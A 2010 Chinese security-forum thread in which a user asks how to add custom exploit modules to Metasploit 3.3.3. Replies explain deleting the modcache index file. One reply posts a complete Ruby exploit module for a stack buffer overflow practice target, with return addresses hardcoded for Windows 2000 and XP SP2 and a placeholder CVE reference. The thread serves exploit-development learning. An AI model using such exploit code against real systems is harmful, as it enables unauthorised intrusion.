首页
社区
课程
招聘
[求助]Metasploit Framework 3.3.3里面怎么添加EXPLOIT?
发表于: 2010-2-1 17:26 11079

[求助]Metasploit Framework 3.3.3里面怎么添加EXPLOIT?

2010-2-1 17:26
11079
【求助】Metasploit Framework 3.3.3里面怎么添加EXPLOIT? 在C:\Program Files\Metasploit\Framework3\msf3\modules\exploits目录下面建文件夹 再发文件 貌似没用,,诚心求教 麻烦高人出来指点下~~

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (6)
雪    币: 206
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
还有高手出来指点下啊?真的是杯具了
2010-2-9 16:38
0
雪    币: 48
活跃值: (53)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
高手不出来,帮你顶顶看
2010-2-10 15:44
0
雪    币: 193
活跃值: (30)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
4
我使用的是Metasploit Framework 3.3.2,原理和3.3.3应该也差不多。
之所以出现添加不进去的情况是因为一个名为“modcache”的文件在作怪,该文件的位置是在“安装目录\Metasploit\Framework3\home\Administrator\.msf3\”下面,添加完你的exploit后要先删除这个文件,然后重新启动整个程序。因为这个文件相当于一个所有exploit的索引,Metasploit 就是通过这个文件来定位你的exploit脚本。
至于以前的版本,这个文件是放在“C:\Documents and Settings\bjca\Application Data\.msf3”中的,我们可以通过直接搜索modcache文件来定位文件的位置。
2010-2-25 13:49
0
雪    币: 10
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
##
# $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'
module Msf
class Exploits::Yangshuo::POC < Msf::Exploit::Remote
include Exploit::Remote::Tcp

        def initialize(info = {})
                super(update_info(info,
                        'Name'          => 'YANGSHUO_POC',
                        'Version'       => '1.0',
                        'Platform'        => 'win',
                        'Privileged'        => true,
                        'License'       => MSF_LICENSE,
                        'Author'        => 'yangshuo',
                        'Targets'       => [                               
                                                ['Windows 2000',  {'Ret' => [200 , 0x77e2307b] }],
                                                ['Windows XP SP2',{'Ret' => [200 , 0x7C914393] }],                                               
                                            ],
                        'DefaultTarget' => 0,
                                                       
                        'Payload'       => {
                                                'Space'    => 200,
                                                'BadChars' => "\x00",
                                                'StackAdjustment' => -3500,
                                            },       
                        'Description'    => %q{
                                                this module is exploit practice of book
                                                "Vulnerability Exploit and Analysis Technique"
                                                used only for educational purpose
                                                },
                        'Arch'           => 'x86',
                        'References'     => [
                                                    [ 'URL', 'http://www.failwest.com' ],
                                                    [ 'CVE', '44444' ],
                                                   ],
                        'DefaultOptions' => { 'EXITFUNC' => 'process' }                     
                     ))
        end #end of initialize

        def exploit
                connect
                print_status("Sending #{payload.encoded.length} byte payload...")
                buf = 'a'*target['Ret'][0]
                buf << [target['Ret'][1]].pack('V')
                buf <<payload.encoded;
                sock.put(buf)       
                handler
                disconnect
        end  #end of exploit def
end
end
这是  修改FAILWEST的  代码所得的,你看看  必须符合MF3的标准才可以  上面那个ID,# $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $
class Exploits::Yangshuo::POC   这个类名一定要大写  要不报错!~~~~~
你试试吧  要不行  你在发帖!
2010-4-15 13:45
0
雪    币: 211
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
谢谢楼上得提点。受教了。
2010-4-26 11:04
0
雪    币: 1462
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
认认真真的学习。
2010-4-27 16:58
0
游客
登录 | 注册 方可回帖
返回
//